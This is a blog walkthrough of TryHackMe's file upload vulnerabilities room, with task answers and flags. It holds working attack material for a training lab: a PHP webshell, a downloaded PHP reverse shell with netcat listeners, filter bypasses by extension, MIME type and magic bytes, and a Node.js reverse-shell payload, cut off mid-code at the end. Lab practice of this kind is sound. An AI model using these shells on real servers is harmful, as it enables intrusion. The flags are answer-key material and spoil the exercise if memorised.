TryHackMe: Upload Vulnerabilities — Walkthrough

September 17, 2023
September 17, 2023 Jasper

Hi! It is time to look at TryHackMe’s Upload Vulnerabilities room. Upload vulnerabilities are an extremely useful and exciting field, so let’s go!

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Room URL: https://tryhackme.com/room/uploadvulns


Task 1 (Getting Started)

Using your favourite text editor in an administrative session, open the hosts file on your device.

  • On Linux and MacOS the hosts file can be found at /etc /hosts.
  • On Windows the hosts file can be found at C:\Windows\System32\drivers\etc\hosts.

Add the following line in at the end of the file:

10.10.59.50 overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm demo.uploadvulns.thm

Note: If you have done this step before then you must remove the previous entry. There should only ever be one line in the file that contains the above URLs. For example, the following example will not work:

When you terminate your box, make sure to remove this line! You should now be able to access the virtual machine, so let’s get started!

Questions

Configure your hosts file for the task, as per the instructions above

It should look like this:

You are now able to visit the following page: overwrite.uploadvulns.thm.

Answer: No answer needed


Task 2 (Introduction to Upload Vulnerabilities)

The ability to upload files to a server has become an integral part of how we interact with web applications. Unfortunately, when handled badly, file uploads can also open up severe vulnerabilities in the server. This can lead to anything from relatively minor, nuisance problems; all the way up to full Remote Code Execution (RCE) if an attacker manages to upload and execute a shell. With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content — up to and including injecting malicious webpages, which lead to further vulnerabilities such as XSS or CSRF. By uploading arbitrary files, an attacker could potentially also use the server to host and/or serve illegal content, or to leak sensitive information. Realistically speaking, an attacker with the ability to upload a file of their choice to your server — with no restrictions — is very dangerous indeed.

The purpose of this room is to explore some of the vulnerabilities resulting from improper (or inadequate) handling of file uploads. Specifically, we will be looking at:

  • Overwriting existing files on a server
  • Uploading and Executing Shells on a server
  • Bypassing Client-Side filtering
  • Bypassing various kinds of Server-Side filtering
  • Fooling content type validation checks

Completing the web enumeration (or at least the Gobuster section) and What the Shell rooms would be a good idea before attempting the content in this room.

Questions

Read and understand the above information.

Answer: No answer needed


Task 3 (General Methodology)

So, we have a file upload point on a site. How would we go about exploiting it?

As with any kind of hacking, enumeration is key. The more we understand about our environment, the more we’re able to do with it. Looking at the source code for the page is good to see if any kind of client-side filtering is being applied. Scanning with a directory bruteforcer such as Gobuster is usually helpful in web attacks, and may reveal where files are being uploaded to; Gobuster is no longer installed by default on Kali, but can be installed with sudo apt install gobuster. Intercepting upload requests with Burpsuite will also come in handy. Browser extensions such as Wappalyser can provide valuable information at a glance about the site you’re targetting.

With a basic understanding of how the website might be handling our input, we can then try to poke around and see what we can and can’t upload. If the website is employing client-side filtering then we can easily look at the code for the filter and look to bypass it (more on this later!). If the website has server-side filtering in place then we may need to take a guess at what the filter is looking for, upload a file, then try something slightly different based on the error message if the upload fails. Uploading files designed to provoke errors can help with this. Tools like Burpsuite or OWASP Zap can be very helpful at this stage.

We’ll go into a lot more detail about bypassing filters in later tasks.

Questions

Read the General Methodology

Answer: No answer needed


Task 4 (Overwriting Existing Files)

When files are uploaded to the server, a range of checks should be carried out to ensure that the file will not overwrite anything which already exists on the server. Common practice is to assign the file with a new name — often either random, or with the date and time of upload added to the start or end of the original filename. Alternatively, checks may be applied to see if the filename already exists on the server; if a file with the same name already exists then the server will return an error message asking the user to pick a different file name. File permissions also come into play when protecting existing files from being overwritten. Web pages, for example, should not be writeable to the web user, thus preventing them from being overwritten with a malicious version uploaded by an attacker.

If, however, no such precautions are taken, then we might potentially be able to overwrite existing files on the server. Realistically speaking, the chances are that file permissions on the server will prevent this from being a serious vulnerability. That said, it could still be quite the nuisance, and is worth keeping an eye out for in a pentest or bug hunting environment.

Now, let’s put this into practice. Open your web browser and navigate to overwrite.uploadvulns.thm. Your goal is to overwrite a file on the server with an upload of your own.

Questions

What is the name of the image file which can be overwritten?

Make sure you opened overwrite.uploadvulns.thm. Take a look at the source code. There is a image tag which point at a image file called mountains.jpg.

Answer: mountains.jpg

Overwrite the image. What is the flag you receive?

Find an image and call it mountains.jpg. Upload it to the website.

You will get a flag:

Answer: THM{OTBiODQ3YmNjYWZhM2UyMmYzZDNiZjI5}


Task 5 (Remote Code Execution)

Remote Code Execution (as the name suggests) would allow us to execute code arbitrarily on the web server. Whilst this is likely to be as a low-privileged web user account (such as www-data on Linux servers), it’s still an extremely serious vulnerability. Remote code execution through a web application tends to be a result of uploading a program written in the same language as the back-end of the website (or another language which the server understands and will execute). Traditionally this would be PHP, however, in more recent times, other back-end languages have become more common (Python Django and Javascript in the form of Node.js being prime examples).

There are two basic ways to achieve RCE on a webserver: webshells, and reverse shells. Realistically a fully featured reverse shell is the ideal goal for an attacker; however, a webshell may be the only option available (for example, if a file length limit has been imposed on uploads). We’ll take a look at each of these in turn. As a general methodology, we would be looking to upload a shell of one kind or another, then activating it, either by navigating directly to the file if the server allows it, or by otherwise forcing the webapp to run the script for us.

Web shells:

Let’s assume that we’ve found a webpage with an upload form. Where do we go from here? Well, let’s start with a gobuster scan:

https://tryhackme.com/room/uploadvulns

Looks like we’ve got two directories here — uploads and assets. Of these, it seems likely that any files we upload will be placed in the “uploads” directory. We’ll try uploading a legitimate image file first. Here I am choosing our cute dog photo from the previous task. Now, if we go to http://demo.uploadvulns.thm/uploads we should see that the spaniel picture has been uploaded!

Ok, we can upload images. Let’s try a webshell now. As it is, we know that this webserver is running with a PHP back-end, so we’ll skip straight to creating and uploading the shell. In real life, we may need to do a little more enumeration; however, PHP is a good place to start regardless.

A simple webshell works by taking a parameter and executing it as a system command. In PHP, the syntax for this would be:

<?php
echo system($_GET["cmd"]);
?>

This code takes a GET parameter and executes it as a system command. It then echoes the output out to the screen. Let’s try uploading it to the site, then using it to show our current user and the contents of the current directory:

https://tryhackme.com/room/uploadvulns

We could now use this shell to read files from the system, or upgrade from here to a reverse shell. Now that we have RCE, the options are limitless. Note that when using webshells, it’s usually easier to view the output by looking at the source code of the page. This drastically improves the formatting of the output.

Reverse Shells:

The process for uploading a reverse shell is almost identical to that of uploading a webshell, so this section will be shorter. We’ll be using the ubiquitous Pentest Monkey reverse shell, which comes by default on Kali Linux, but can also be downloaded here. You will need to edit line 49 of the shell. It will currently say $ip = '127.0.0.1'; // CHANGE THIS
— as it instructs, change 127.0.0.1 to your TryHackMe tun0 IP address, which can be found on the access page. You can ignore the following line, which also asks to be changed. With the shell edited, the next thing we need to do is start a Netcat listener to receive the connection. nc -lvnp 1234.

Now, let’s upload the shell, then activate it by navigating to http://demo.uploadvulns.thm/uploads/shell.php. The name of the shell will obviously be whatever you called it (php-reverse-shell.php by default). The website should hang and not load properly — however, if we switch back to our terminal, we have a hit!

Once again, we have obtained RCE on this webserver. From here we would want to stabilise our shell and escalate our privileges, but those are tasks for another time. For now, it’s time you tried this for yourself!

Navigate to shell.uploadvulns.thm and complete the questions for this task.

Questions

Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads?

The syntax is as follows:

gobuster dir -u http://shell.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Resources seems like a good bet!

Answer: /resources

Get either a web shell or a reverse shell on the machine.
What’s the flag in the /var/www/ directory of the server?

Let us start by downloading the script mentioned in the description:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Afterwards, edit the file (nano php-reverse-shell.php) and set the ip variable to the ip of your attacker machine.

Finally, run the following command on your attacker machine nc -lvnp 1234 . This will open a netcat listener which will be setup to receive reverse shell access coming from the web server.

Now upload the script on the website!

Press upload. Now the file should be visible in the resources folder.

Then run the script by visiting:

http://shell.uploadvulns.thm/resources/php-reverse-shell.php

You should have reverse shell access now!

All that is left now is finding the flag in the /var/www folder.

Answer: THM{YWFhY2U3ZGI4N2QxNmQzZjk0YjgzZDZk}


Task 6 (Filtering)

Up until now we have largely been ignoring the counter-defences employed by web developers to defend against file upload vulnerabilities. Every website that you’ve successfully attacked so far in this room has been completely insecure. It’s time that changed. From here on out, we’ll be looking at some of the defence mechanisms used to prevent malicious file uploads, and how to circumvent them. First up, let’s discuss the differences between client-side filtering and server-side filtering.

When we talk about a script being “Client-Side”, in the context of web applications, we mean that it’s running in the user’s browser as opposed to on the web server itself. JavaScript is pretty much ubiquitous as the client-side scripting language, although alternatives do exist. Regardless of the language being used, a client-side script will be run in your web browser. In the context of file-uploads, this means that the filtering occurs before the file is even uploaded to the server. Theoretically, this would seem like a good thing, right? In an ideal world, it would be; however, because the filtering is happening on our computer, it is trivially easy to bypass. As such client-side filtering by itself is a highly insecure method of verifying that an uploaded file is not malicious.

Conversely, as you may have guessed, a server-side script will be run on the server. Traditionally PHP was the predominant server-side language (with Microsoft’s ASP for IIS coming in close second); however, in recent years, other options (C#, Node.js, Python, Ruby on Rails, and a variety of others) have become more widely used. Server-side filtering tends to be more difficult to bypass, as you don’t have the code in front of you. As the code is executed on the server, in most cases it will also be impossible to bypass the filter completely; instead we have to form a payload which conforms to the filters in place, but still allows us to execute our code. With that in mind, let’s take a look at some different kinds of filtering.

Extension Validation:

File extensions are used (in theory) to identify the contents of a file. In practice they are very easy to change, so actually don’t mean much; however, MS Windows still uses them to identify file types, although Unix based systems tend to rely on other methods, which we’ll cover in a bit. Filters that check for extensions work in one of two ways. They either blacklist extensions (i.e. have a list of extensions which are not allowed) or they whitelist extensions (i.e. have a list of extensions which are allowed, and reject everything else).

File Type Filtering:

Similar to Extension validation, but more intensive, file type filtering looks, once again, to verify that the contents of a file are acceptable to upload. We’ll be looking at two types of file type validation:

  • MIME validation: MIME (Multipurpose Internet Mail Extension) types are used as an identifier for files — originally when transferred as attachments over email, but now also when files are being transferred over HTTP(S). The MIME type for a file upload is attached in the header of the request, and looks something like this:
https://tryhackme.com/room/uploadvulns
  • MIME types follow the format <type>/<subtype>. In the request above, you can see that the image “spaniel.jpg” was uploaded to the server. As a legitimate JPEG image, the MIME type for this upload was “image/jpeg”. The MIME type for a file can be checked client-side and/or server-side; however, as MIME is based on the extension of the file, this is extremely easy to bypass.
  • Magic Number validation: Magic numbers are the more accurate way of determining the contents of a file; although, they are by no means impossible to fake. The “magic number” of a file is a string of bytes at the very beginning of the file content which identify the content. For example, a PNG file would have these bytes at the very top of the file: 89 50 4E 47 0D 0A 1A 0A.
  • Unlike Windows, Unix systems use magic numbers for identifying files; however, when dealing with file uploads, it is possible to check the magic number of the uploaded file to ensure that it is safe to accept. This is by no means a guaranteed solution, but it’s more effective than checking the extension of a file.

File Length Filtering:

File length filters are used to prevent huge files from being uploaded to the server via an upload form (as this can potentially starve the server of resources). In most cases this will not cause us any issues when we upload shells; however, it’s worth bearing in mind that if an upload form only expects a very small file to be uploaded, there may be a length filter in place to ensure that the file length requirement is adhered to. As an example, our fully fledged PHP reverse shell from the previous task is 5.4Kb big — relatively tiny, but if the form expects a maximum of 2Kb then we would need to find an alternative shell to upload.

File Name Filtering:

As touched upon previously, files uploaded to a server should be unique. Usually this would mean adding a random aspect to the file name, however, an alternative strategy would be to check if a file with the same name already exists on the server, and give the user an error if so. Additionally, file names should be sanitised on upload to ensure that they don’t contain any “bad characters”, which could potentially cause problems on the file system when uploaded (e.g. null bytes or forward slashes on Linux, as well as control characters such as ; and potentially unicode characters). What this means for us is that, on a well administered system, our uploaded files are unlikely to have the same name we gave them before uploading, so be aware that you may have to go hunting for your shell in the event that you manage to bypass the content filtering.

File Content Filtering:

More complicated filtering systems may scan the full contents of an uploaded file to ensure that it’s not spoofing its extension, MIME type and Magic Number. This is a significantly more complex process than the majority of basic filtration systems employ, and thus will not be covered in this room.

It’s worth noting that none of these filters are perfect by themselves — they will usually be used in conjunction with each other, providing a multi-layered filter, thus increasing the security of the upload significantly. Any of these filters can all be applied client-side, server-side, or both.

Similarly, different frameworks and languages come with their own inherent methods of filtering and validating uploaded files. As a result, it is possible for language specific exploits to appear; for example, until PHP major version five, it was possible to bypass an extension filter by appending a null byte, followed by a valid extension, to the malicious .php file. More recently it was also possible to inject PHP code into the exif data of an otherwise valid image file, then force the server to execute it. These are things that you are welcome to research further, should you be interested.

Questions

What is the traditionally predominant server-side scripting language?

PHP was the most popular server-side language. It is still popular though, as the world’s most popular Content Management System is run on PHP!

Answer: PHP

When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?

Answer: whitelist

[Research] What MIME type would you expect to see when uploading a CSV file?

A quick use of Google gives use the answer:

Answer: text/csv


Task 7 (Bypassing Client-Side Filtering)

We’ll begin with the first (and weakest) line of defence: Client-Side Filtering. As mentioned previously, client-side filtering tends to be extremely easy to bypass, as it occurs entirely on a machine that you control. When you have access to the code, it’s very easy to alter it.

There are four easy ways to bypass your average client-side file upload filter:

  1. Turn off Javascript in your browser — this will work provided the site doesn’t require Javascript in order to provide basic functionality. If turning off Javascript completely will prevent the site from working at all then one of the other methods would be more desirable; otherwise, this can be an effective way of completely bypassing the client-side filter.
  2. Intercept and modify the incoming page. Using Burpsuite, we can intercept the incoming web page and strip out the Javascript filter before it has a chance to run. The process for this will be covered below.
  3. Intercept and modify the file upload. Where the previous method works before the webpage is loaded, this method allows the web page to load as normal, but intercepts the file upload after it’s already passed (and been accepted by the filter). Again, we will cover the process for using this method in the course of the task.
  4. Send the file directly to the upload point. Why use the webpage with the filter, when you can send the file directly using a tool like curl? Posting the data directly to the page which contains the code for handling the file upload is another effective method for completely bypassing a client side filter. We will not be covering this method in any real depth in this tutorial, however, the syntax for such a command would look something like this: curl -X POST -F "submit:<value>" -F "<file-parameter>:@<path-to-file>" <site>. To use this method you would first aim to intercept a successful upload (using Burpsuite or the browser console) to see the parameters being used in the upload, which can then be slotted into the above command.

We will be covering methods two and three in depth below.


Let’s assume that, once again, we have found an upload page on a website. As always, we’ll take a look at the source code. Here we see a basic Javascript function checking for the MIME type of uploaded files:

In this instance we can see that the filter is using a whitelist to exclude any MIME type that isn’t image/jpeg.

Our next step is to attempt a file upload — as expected, if we choose a JPEG, the function accepts it. Anything else and the upload is rejected. Having established this, let’s start Burpsuite and reload the page. We will see our own request to the site, but what we really want to see is the server’s response, so right click on the intercepted data, scroll down to “Do Intercept”, then select “Response to this request”.$ When we click the “Forward” button at the top of the window, we will then see the server’s response to our request. Here we can delete, comment out, or otherwise break the Javascript function before it has a chance to load:

Having deleted the function, we once again click “Forward” until the site has finished loading, and are now free to upload any kind of file to the website.

It’s worth noting here that Burpsuite will not, by default, intercept any external Javascript files that the web page is loading. If you need to edit a script which is not inside the main page being loaded, you’ll need to go to the “Options” tab at the top of the Burpsuite window, then under the “Intercept Client Requests” section, edit the condition of the first line to remove ^js$|.


We’ve already bypassed this filter by intercepting and removing it prior to the page being loaded, but let’s try doing it by uploading a file with a legitimate extension and MIME type, then intercepting and correcting the upload with Burpsuite.

Having reloaded the webpage to put the filter back in place, let’s take the reverse shell that we used before and rename it to be called “shell.jpg”. As the MIME type (based on the file extension) automatically checks out, the Client-Side filter lets our payload through without complaining.

Once again we’ll activate our Burpsuite intercept, then click “Upload” and catch the request:

Observe that the MIME type of our PHP shell is currently image/jpeg. We’ll change this to text/x-php, and the file extension from .jpg to .php, then forward the request to the server:

Now, when we navigate to http://demo.uploadvulns.thm/uploads/shell.php having set up a netcat listener, we receive a connection from the shell.


We’ve covered in detail two ways to bypass a Client-Side file upload filter. Now it’s time for you to give it a shot for yourself! Navigate to java.uploadvulns.thm and bypass the filter to get a reverse shell. Remember that not all client-side scripts are inline! As mentioned previously, Gobuster would be a very good place to start here — the upload directory name will be changing with every new challenge.

Answer the questions below

What is the flag in /var/www/?

Let’s do some enumeration to figure out which of the types of methods we can use to avoid the filter.

We can run gobuster to get some info about the directory structure of the web server. The syntax is as follows:

gobuster dir -u http://java.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Our file uploads are likely saved in /images.

Now, let’s have a look in the source code to see what we are working with.

There is a Javascript file called “client-side-filter.js”, which sounds very relevant. Look at it:

As we can see, there is some client-side code that enforces the image/png file type. Now we have two options: intercept and and modify the incoming page (strip out the Javascript), or intercept and modify the file upload.

Before moving on though, let’s get the shell script again. I will discuss this only briefly, as the process is the same as in step 5.

Now let’s try and upload the script on the website! As said before, we have two options:

  1. We can use Burp to intercept our GET request to get the page. Afterwards we use Do Intercept-> Response to this Request, and forward this. We can then comment the line that includes the filtering script:

We can then upload the file as is.

We can then run the file found in the following folder:

We got access!

And found the flag!

2. Alternatively, we can rename the file to a .png so it is allowed through the filter. Before pressing upload start Burp and capture our upload request:

We can change its file name and MIME type. Make sure you change the filename and content-type to the following (see line 15 and 16).

Then forward the request. This way we also got the file uploaded.

As above, make sure you got a netcat listener active, and run the script! You got the flag (again) 🙂

Both ways will lead to the same anwer!

Answer: THM{NDllZDQxNjJjOTE0YWNhZGY3YjljNmE2}


Task 8 (Bypassing Server-Side Filtering: File Extensions)

Client-side filters are easy to bypass — you can see the code for them, even if it’s been obfuscated and needs processed before you can read it; but what happens when you can’t see or manipulate the code? Well, that’s a server-side filter. In short, we have to perform a lot of testing to build up an idea of what is or is not allowed through the filter, then gradually put together a payload which conforms to the restrictions.

For the first part of this task we’ll take a look at a website that’s using a blacklist for file extensions as a server side filter. There are a variety of different ways that this could be coded, and the bypass we use is dependent on that. In the real world we wouldn’t be able to see the code for this, but for this example, it will be included here:

<?php
//Get the extension
$extension = pathinfo($_FILES["fileToUpload"]["name"])["extension"];
//Check the extension against the blacklist -- .php and .phtml
switch($extension){
case "php":
case "phtml":
case NULL:
$uploadFail = True;
break;
default:
$uploadFail = False;
}
?>

We can see that the code is filtering out the .php and .phtml extensions, so if we want to upload a PHP script we’re going to have to find another extension. The wikipedia page for PHP gives us a few common extensions that we can try; however, there are actually a variety of other more rarely used extensions available that web servers may nonetheless still recognise. These include: .php3.php4.php5.php7.phps.php-s.pht and .phar. Many of these bypass the filter (which only blocks.php and .phtml), but it appears that the server is configured not to recognise them as PHP files.

This is actually the default for Apache2 servers, at the time of writing; however, the sysadmin may have changed the default configuration (or the server may be out of date), so it’s well worth trying.

Eventually we find that the .phar extension bypasses the filter — and works — thus giving us our shell.


Let’s have a look at another example, with a different filter. This time we’ll do it completely black-box: i.e. without the source code. We’ll start by scoping this out with a completely legitimate upload. Let’s try uploading the spaniel.jpg image from before.

Well, that tells us that JPEGS are accepted at least. Let’s go for one that we can be pretty sure will be rejected (shell.php). This got rejected. Can’t say that was unexpected.

From here we enumerate further, trying the techniques from above and just generally trying to get an idea of what the filter will accept or reject. In this case we find that there are no shell extensions that both execute, and are not filtered, so it’s back to the drawing board.

In the previous example we saw that the code was using the pathinfo() PHP function to get the last few characters after the ., but what happens if it filters the input slightly differently?

Let’s try uploading a file called shell.jpg.php. We already know that JPEG files are accepted, so what if the filter is just checking to see if the .jpg file extension is somewhere within the input?

When we try to upload our file we get a success message. Navigating to the /uploads directory confirms that the payload was successfully uploaded.

This is by no means an exhaustive list of upload vulnerabilities related to file extensions. As with everything in hacking, we are looking to exploit flaws in code that others have written; this code may very well be uniquely written for the task at hand. This is the really important point to take away from this task: there are a million different ways to implement the same feature when it comes to programming — your exploitation must be tailored to the filter at hand. The key to bypassing any kind of server side filter is to enumerate and see what is allowed, as well as what is blocked; then try to craft a payload which can pass the criteria the filter is looking for.


Now your turn. You know the drill by now — figure out and bypass the filter to upload and activate a shell. Your flag is in /var/www/. The site you’re accessing is annex.uploadvulns.thm.

Be aware that this task has also implemented a randomised naming scheme for the first time. For now you shouldn’t have any trouble finding your shell, but be aware that directories will not always be indexable…

Questions

What is the flag in /var/www/?

Let’s start by running gobuster again, like in previous tasks.

gobuster dir -u http://annex.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Interesting with /server-status. But otherwise /privacy is a good bet for file uploads.

Let us try uploading our payload. You never know if we are lucky right? Make you sure you still have the file downloaded on your system. Uploading the payload as php however, does not work and gives the following message.

Uploading a normal .jpg image works! Same for a text file.

We can try adding a rename our file to having .jpg before the .php extension.

Unfortunately this does not work either. Let’s try the .phar extension now. Nope! 🙁

Time for another extension mentioned in the discussen: php5. This works!

Before running the script, make sure to run a netcat listener:

nc -lvnp 1234

We got the flag. WOOH!

Answer: THM{MGEyYzJiYmI3ODIyM2FlNTNkNjZjYjFl}


Task 9 (Bypassing Server-Side Filtering: Magic Numbers)

We’ve already had a look at server-side extension filtering, but let’s also take the opportunity to see how magic number checking could be implemented as a server-side filter.

Magic numbers are used as a more accurate identifier of files. The magic number of a file is a string of hex digits, and is always the very first thing in a file. Knowing this, it’s possible to use magic numbers to validate file uploads, simply by reading those first few bytes and comparing them against either a whitelist or a blacklist. Bear in mind that this technique can be very effective against a PHP based webserver; however, it can sometimes fail against other types of webserver (hint hint).

Let’s take a look at an example. As per usual, we have an upload page: As expected, if we upload our standard shell.php file, we get an error; however, if we upload a JPEG, the website is fine with it. All running as per expected so far.

From the previous attempt at an upload, we know that JPEG files are accepted, so let’s try adding the JPEG magic number to the top of our shell.php file. A quick look at the list of file signatures on Wikipedia shows us that there are several possible magic numbers of JPEG files. It shouldn’t matter which we use here, so let’s just pick one (FF D8 FF DB). We could add the ASCII representation of these digits (ÿØÿÛ) directly to the top of the file but it’s often easier to work directly with the hexadecimal representation, so let’s cover that method.

Before we get started, let’s use the Linux file command to check the file type of our shell. As expected, the command tells us that the filetype is PHP. Keep this in mind as we proceed with the explanation.

We can see that the magic number we’ve chosen is four bytes long, so let’s open up the reverse shell script and add four random characters on the first line. These characters do not matter, so for this example we’ll just use four “A”s.

Save the file and exit. Next we’re going to reopen the file in hexeditor (which comes by default on Kali), or any other tool which allows you to see and edit the shell as hex. In hexeditor the file looks like this:

https://tryhackme.com/room/uploadvulns

Note the four bytes in the red box: they are all 41, which is the hex code for a capital “A” — exactly what we added at the top of the file previously. Change this to the magic number we found earlier for JPEG files: FF D8 FF DB

https://tryhackme.com/room/uploadvulns

Now if we save and exit the file (Ctrl + x), we can use file once again, and see that we have successfully spoofed the filetype of our shell. It now says JPEG image data.

Perfect. Now let’s try uploading the modified shell and see if it bypasses the filter! It works, so we bypassed the server-side magic number filter and received a reverse shell.


Head to magic.uploadvulns.thm — it’s time for the last mini-challenge.

This will be the final example website you have to hack before the challenge in task eleven; as such, we are once again stepping up the level of basic security. The website in the last task implemented an altered naming scheme, prepending the date and time of upload to the file name. This task will not do so to keep it relatively easy; however, directory indexing has been turned off, so you will not be able to navigate to the directory containing the uploads. Instead you will need to access the shell directly using its URI.

Bypass the magic number filter to upload a shell. Find the location of the uploaded shell and activate it. Your flag is in /var/www/.

Questions

Grab the flag from /var/www/

Once more into the fray!

Let’s run gobuster to figure out which directories we have access to. Bear in mind that directory indexing is turned of.

Let’s remember /graphics. Since directory indexing is turned of we cannot see a list of files in the folder. But we should still be able to directly run a file if we know its name!

Now we can try uploading a jpg to see if this file type is accepted.

The site returns that only GIFs are accepted. Let’s try that!

So we know that we need to edit our payload so that it gets recognized as a gif file. If we look at the following wiki page (https://en.wikipedia.org/wiki/List_of_file_signatures) we can see that the signature for GIFs is equal to 47 49 46 38 37 61 or 47 49 46 38 39 61. Let’s use the first.

As discussed in the theory, we now ened to add 6 random characters to the PHP scripts, as the magic number for GIFs is 6 bytes long.

Save the file, and now we have to run hexeditor php-reverse-shell.php. You can see the 6 bytes that we added earlier:

The character capital ‘A’ is represented by the hex code 41. Let’s change these to 47 49 46 38 37 61.

If we use file on the file now:

We are all set! Start a netcat listener on your system and select the edited PHP file on the page.

Press upload and you should get be able to run the payload at:

http://magic.uploadvulns.thm/graphics/php-reverse-shell.php

And we got access!

WE DID IT!

That was fun! 🙂

Answer: THM{MWY5ZGU4NzE0ZDlhNjE1NGM4ZThjZDJh}


Task 10 (Example Methodology)

We’ve seen various different types of filter now — both client side and server side — as well as the general methodology for file upload attacks. In the next task you’re going to be given a black-box file upload challenge to complete, so let’s take the opportunity to discuss an example methodology for approaching this kind of challenge in a little more depth. You may develop your own alternative to this method, however, if you’re new to this kind of attack, you may find the following information useful.

We’ll look at this as a step-by-step process. Let’s say that we’ve been given a website to perform a security audit on.

  1. The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page.
  2. Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control.
  3. We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What’s the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we’re attacking, it also gives us a baseline “accepted” file which we can base further testing on. An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php.txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you’ve managed to upload a payload and the server is changing the name of uploaded files.
  4. Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps.

Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place:

  • If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist.
  • Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter.
  • As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types.
  • Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you’ll know what the acceptable limit is. If you’re very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we’ve been using so far.

You should now be well equipped to take on the challenge in task eleven.

Questions

Read the example methodology

Answer: No answer needed


Task 11 (Challenge)

It’s challenge time!

Head over to jewel.uploadvulns.thm.

Take what you’ve learned in this room and use it to get a shell on this machine. As per usual, your flag is in /var/www/. Bear in mind that this challenge will be an accumulation of everything you’ve learnt so far, so there may be multiple filters to bypass. The attached wordlist might help. Also remember that not all webservers have a PHP backend.

If you need a help, there are a series of hints here.

Questions

Hack the machine and grab the flag from /var/www/

Let’s get going. We can follow the steps mentioned before:

  1. Taking a look at the website. Visit: http://jewel.uploadvulns.thm/. We can see an upload form. Let’s use Burp to look capture the server response. Startup Burp Suite and turn on the proxy. Intercept your get request loading the page, right click it, and send it to repeater. Now press send to see the response like below:

We should especially look at the Server and X-Powered-By headers. Here we can see that it running on Express (a Javascript backend framework built on Node.js), and that it is running on a Ubuntu server. So this is not a PHP backend, like in all the previous assignments!

2. Looking at the source code to see client-side filtering.

Now let’s look at the source code to see if there are any forms of client-side filtering:

There definitely is! The form itself only accepts jpeg files, and the page also includes a upload.js file that filters on both file size, magic number and file extension. But all of this is client side! So we can simply edit the input element to accept all kinds of files, and we can remove the inclusion of the upload.js file.

Finally, if we look at the source url of the background images, we can see that they are stored in the /content folder:

3. Attempt a file upload.

Let’s upload a regular jpg file, as the input field allows. This works:

The same can’t be said for PNGs, as we are not able to select these.

Now it is time to use gobuster. Originally I started using the attached wordlist file, but this did not return anything. After some experimentation I figured that this wordlist is used to find the names for the uploaded files. We should instead use the wordlist we used earlier:

gobuster dir -u http://jewel.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The files must get uploaded to /content (in accordance with the URL of the background images). The admin page also looks very promising:

This might come in handy later!

Make sure you have uploaded a file, and afterwards it is time to run gobuster again with the -x jpg flag. This will allow us to find out where the file is saved. Now we should use the attached wordlist file as this relates to the filenames of images.

gobuster dir -u http://jewel.uploadvulns.thm/content -w UploadVulnsWordList.txt -x jpg

Sure enough. We have found the images! Also our uploaded image:

Now we are completely sure our files end up in the content folder.

4. Attempt a malicious file upload.

Now we need to look what kind of server-side filters are running. Before we do these trials we need to make sure that the front-end code is deactivated by getting the response for the upload.js file. . This is done under Do Intercept — Response to this request. If you do not receive the resource, but only get a 304 response, clear your cache! If you cannot see the js. file request, you need to go under options, and remove .js from the following rule:

Here is how to intercept the Javascript response.

Deactivate the following code:

When you have done that it is time to explore server-side filters. These could be related to: file extension, MIME, magic number or file size:

  • Let’s start with an invalid file extension to check if a blacklist is used to block executables. I converted my cat.jpg to cat.jpgweirdext. This was an invalid file extension. A blacklist is therefore not used, and a whitelist is used in the filter.
  • magic number — Now we can take the valid image, and change it’s magic number to something we expect to be filtered. Let’s try the magic number for gif files (47 49 46 38 37 61):

This still worked! Hence the website is not using a magic number filter.

  • MIME type — Now we will adjust the post request we send after uploading a jpg picture, which we will know would normally be approved. Now we get the following error: INVALID FILE TYPE. The same if I try .png or text. So there is a MIME type filter active.
  • file size — I am going to continue with uploading a payload, and I will get back to this filter if it become relevant.

We know two things: 1. It is an express web server. 2. It uses a file extension and MIME type filter.

We need to find a .js payload targeting Express.js, and give it the right extension and MIME type when uploading.

A payload can be found here:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4242, "10.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
